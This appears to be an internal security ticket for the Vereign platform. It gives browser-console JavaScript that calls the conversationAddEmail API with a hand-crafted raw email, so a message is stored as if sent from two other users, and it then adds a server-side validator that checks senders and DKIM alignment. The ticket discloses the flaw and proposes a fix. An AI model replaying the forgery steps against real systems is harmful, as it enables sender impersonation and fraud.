Check that a user cannot create a fake email. As an example, a user was able to add an email to Vereign without actually sending it from Gmail, by calling the VCL API directly.
- Go to any env, for example https://staging.vereign.com
- Get access to the VCL (run in the browser console of the chosen env; `lib` is the handle used by the calls below):

```javascript
lib = await window.setupViamAPI(
  "root",
  {
    onEvent: () => {}
  },
  `${document.location.origin}/vcl/js/iframe`,
  `${document.location.origin}/api/`,
  `${document.location.origin}/wopi/`,
  `${document.location.origin}`
)
```
- At present the user is able to add a conversation to the system by calling `conversationAddEmail` with a prepared raw message.
  In the example below you can see that I used two emails in the From field: gospodin.bodurov@vereign.com, kalin.canov@vereign.com, and one email in the To field: alexey.lunin@vereign.com.
  So in our system this message is displayed as a message sent from the above two addresses.
```javascript
// Submits a hand-crafted raw email through the VCL API; `lib` is the handle
// returned by window.setupViamAPI above. The From header names two other
// users, yet the message is stored under the caller's own passport id and no
// email is ever actually sent. Continuation lines of the folded headers are
// indented with a space and the header block is separated from the body by
// a blank line, as RFC 5322 requires.
send = async (passportId, messageId) => {
  return await lib.conversationAddEmail(passportId, `Delivered-To: example@example.com
Received: by 2002:a4f:f651:0:0:0:0:0 with SMTP id c17csp869211ivp;
 Mon, 1 Apr 2019 15:19:05 -0700 (PDT)
X-Google-Smtp-Source: APXvYqxH/ypATs94L1JJKnqdeoXCP3xprGTgaqlMfN4RVQs6oZXs3OU459etudz7udpaYH6c+Mro
X-Received: by 2002:a50:b309:: with SMTP id q9mr43778263edd.91.1554157144953;
 Mon, 01 Apr 2019 15:19:04 -0700 (PDT)
ARC-Seal: i=1; a=rsa-sha256; t=1554157144; cv=none;
 d=google.com; s=arc-20160816;
 b=HkM1GJyThICcJ6P51pPkegCoQqoXzpy6+93fYLEK1zYf8aKaZJqMPWn+6S31oQc0x8
 zszOmUoMlM3mrn7BIGNNtnnJeBjJujltM68prWe7Xf/iRE1NIHpLLaw8AdEHicmPKuyK
 dRTMfbuxXfl4pGSdO3kd+MU2Z/ftq6sedlwNgsUwziNA8mQ7CLTTCHrX2emSalIX6ao8
 PLGVD2IGTuIhfI+9vt4VCRPXIEYZ0WmCEVtCk1UYiSIGQQBCJUTeVRHUsuez3WbZy+Bm
 ipG8G5guW6v0ITQtTLNkDFsRdr2jcUcyWlJNc/gaTtdjq3iaBTu/gRt4qK/mHIfWiDkb
 HwGA==
ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816;
 h=to:subject:mime-version:message-id:from:date:dkim-signature
 :mime-version;
 bh=PpaT4m835AW80DsP2mo2xZT/LYgNpBTg/TeA1fTy0vI=;
 b=Sa2Efe1rL8J6OHXHx2BFRIje2ROT+Q6BrdDoW5ySvvKtHYtTa/ztgWB0kJTmWw1tOL
 Rybn8or7vzo2bCUrWp+qMmnzjFiRyyuLColBQKMg8FWH9jB0/2Ju2TsirgiDtywGaPXr
 IGR7K62hySlqWeCskDW84N4aWaiszqD7C0n6K55ofCPpEBvCcY8gER6AFloJt7g/YBdu
 2so3aipQPUM1B9OqfngMOgR9LlQ2GbjyvGckvfCt47ZsBWK9yntPCfhwMAtU1oWmeWKV
 k1arETsmUymnDKmd6hu2kjXEsgDZMg4xfoHHFVI4Bd0P+RZ4aEAmXzcPQ6R6Es6RfdBf
 ++gw==
ARC-Authentication-Results: i=1; mx.google.com;
 dkim=pass header.i=@gmail.com header.s=dc1 header.b="HcK939/F";
 spf=pass (: domain of alexey.lunin@vereign.com designates 0.0.0.0 as permitted sender) smtp.mailfrom=example@example.com
Return-Path: <example@example.com>
Received: from example.com (dc1.example.com. [0.0.0.])
 by mx.google.com with ESMTPS id p7si128062edm.32.2019.04.01.15.19.04
 for <example@example.com>
 (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128);
 Mon, 01 Apr 2019 15:19:04 -0700 (PDT)
Received-SPF: pass (google.com: domain of example@example.com designates 0.0.0.0 as permitted sender) client-ip=0.0.0.0;
Authentication-Results: mx.example.com;
 dkim=pass header.i=@example.com header.s=dc1 header.b="HcK939/F";
 spf=pass (example.com: domain of example@example.com designates 0.0.0.0 as permitted sender) smtp.mailfrom=example@example.com
MIME-Version: 1.0
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/simple; d=vereign.com; s=dc1;
 t=1554157143; bh=iFoLXx49XxW84s0w5bUyL8lo3y8Od4fHlKuFW9yWPTU=;
 h=Date:From:Subject:To;
 b=HcK939/Ft71xO/AR6Uhb5mPDR1ukfE4qrAU8cNxicxpiZogYjNqOTPGysneIT3os/
 unRVcWvAVv1DXZsNFsbEd8r6476mi9aem1OGRp5SGntVSVZOHsFKOuYTuraRKOKKB1
 /rUEUinaJe96ZDzjUty5WdX3c8q4eRN91EDREay8=
Date: Tue, 02 Apr 2019 02:19:00 +0400
From: gospodin.bodurov@vereign.com,kalin.canov@vereign.com
Message-Id: <fc084f35441ba5${messageId}@example.com>
Mime-Version: 1.0
Subject: [Security] Checking archiving email without real email sending
To: alexey.lunin@vereign.com

--=_d2d1e6ddf837fd97c34cc2953b26d72d
Content-Type: multipart/related; boundary="3fa1d0258d6e0c8cd3b6c983df6c007a9c19d2d68379efef3ad72df6ea6e"
--3fa1d0258d6e0c8cd3b6c983df6c007a9c19d2d68379efef3ad72df6ea6e
Content-Type: text/html; charset="UTF-8"
Content-Transfer-Encoding: quoted-printable
<html><head><title>Vereign - Authentic Communication</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3DUTF-8" />=
</head><body style=3D'font-size: 10pt; font-family: Verdana,Geneva,sans-ser=
if'>
<p>Just checking that I can send a message from gospodin.bodurov@vereign.com and kalin.canov@vereign.com accounts without accessing to them with using my personal passport id</p>
</body></html>
--3fa1d0258d6e0c8cd3b6c983df6c007a9c19d2d68379efef3ad72df6ea6e--
--=_d2d1e6ddf837fd97c34cc2953b26d72d--
--W0RyLiBEYW15YW4gTWl0ZXZd--ck5GzsRpPFPCGD5mmbat8rPQSG0y1wq5GemKV--
Vereign - Authentic Communication`)
}

// Store the forged message under my own passport id; the random suffix keeps
// each Message-Id unique so the call can be repeated.
await send("7a1a1be2-a937-44bb-81db-64e82809b793", Math.random())
```
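The check that would have rejected the message above, as an added example written for this ticket and not Vereign's own code: before a raw email is stored under a passport, every address in its From header must be one the passport's owner has verified, and the DKIM signing domain must align with the sender domain. The helper names, the verified-address lookup and the sample messages are assumptions for illustration; full cryptographic DKIM verification (DNS key lookup) is a separate step not shown.

```javascript
// Added example (not Vereign's code): server-side validation of a raw email
// submitted through conversationAddEmail. Helper names, the verified address
// list and the sample messages are assumptions made for this illustration.

// Parse the header block of an RFC 5322 message, unfolding continuation
// lines (those starting with whitespace) into the preceding header. Parsing
// stops at the first line that is neither a header nor a continuation.
function parseHeaders(raw) {
  const text = raw.replace(/\r\n/g, "\n");
  const end = text.indexOf("\n\n");
  const block = end === -1 ? text : text.slice(0, end);
  const headers = [];
  for (const line of block.split("\n")) {
    if (/^[ \t]/.test(line) && headers.length) {
      headers[headers.length - 1].value += " " + line.trim();
      continue;
    }
    const idx = line.indexOf(":");
    if (idx === -1 || /\s/.test(line.slice(0, idx))) break;
    headers.push({
      name: line.slice(0, idx).trim().toLowerCase(),
      value: line.slice(idx + 1).trim(),
    });
  }
  return headers;
}

function headerValues(headers, name) {
  return headers.filter((h) => h.name === name).map((h) => h.value);
}

// Pull bare, lower-cased addresses out of a From-style header value. Handles
// "Name <user@host>" and plain "user@host" forms; a quoted display name that
// itself contains a comma is not handled, which is fine for a reject-by-default
// check.
function extractAddresses(value) {
  return value
    .split(",")
    .map((part) => {
      const m = part.match(/<([^>]+)>/);
      return (m ? m[1] : part).trim().toLowerCase();
    })
    .filter((a) => a.includes("@"));
}

// Decide whether `raw` may be stored under a passport whose owner has proven
// control of `verifiedAddresses` (assumed to be looked up server-side from the
// passport id, never taken from the request). Returns { ok, reason }.
function validateIngestedEmail(raw, verifiedAddresses) {
  const headers = parseHeaders(raw);
  const from = headerValues(headers, "from");
  if (from.length !== 1) {
    return { ok: false, reason: `expected one From header, got ${from.length}` };
  }
  const senders = extractAddresses(from[0]);
  if (senders.length === 0) {
    return { ok: false, reason: "From header carries no address" };
  }
  const allowed = new Set(verifiedAddresses.map((a) => a.toLowerCase()));
  const unverified = senders.filter((a) => !allowed.has(a));
  if (unverified.length > 0) {
    return { ok: false, reason: `From not verified for this passport: ${unverified.join(", ")}` };
  }
  // Strict DKIM/From alignment: a signing domain (d=) that is not the sender's
  // domain is another sign the message was assembled by hand.
  for (const sig of headerValues(headers, "dkim-signature")) {
    const m = sig.match(/(?:^|;)\s*d=([^;\s]+)/);
    const d = m ? m[1].toLowerCase() : null;
    if (d && !senders.every((a) => a.endsWith("@" + d))) {
      return { ok: false, reason: `DKIM d=${d} does not align with From` };
    }
  }
  return { ok: true, reason: "all sender addresses are verified for this passport" };
}

// Constructed sample: the forged message from this ticket, reduced to the
// headers that matter, naming two colleagues as sender.
const FORGED = [
  "DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/simple; d=vereign.com; s=dc1;",
  "\tt=1554157143; h=Date:From:Subject:To;",
  "From: gospodin.bodurov@vereign.com,kalin.canov@vereign.com",
  "Subject: [Security] Checking archiving email without real email sending",
  "To: alexey.lunin@vereign.com",
  "",
  "Just checking.",
].join("\r\n");

// Constructed sample: the same message with the passport owner's own address.
const GENUINE = FORGED.replace(/^From: .*$/m, "From: Alexey Lunin <alexey.lunin@vereign.com>");

// Assumed server-side lookup result for the passport used in the ticket.
const PASSPORT_VERIFIED = ["alexey.lunin@vereign.com"];

console.log(validateIngestedEmail(FORGED, PASSPORT_VERIFIED));  // ok: false
console.log(validateIngestedEmail(GENUINE, PASSPORT_VERIFIED)); // ok: true
```

The important design point is that the allowed sender list comes from the passport record on the server, so the client cannot influence it the way it controls the raw message today; an additional improvement is to accept only messages the platform itself delivered or received, rather than arbitrary client-supplied RFC 5322 text.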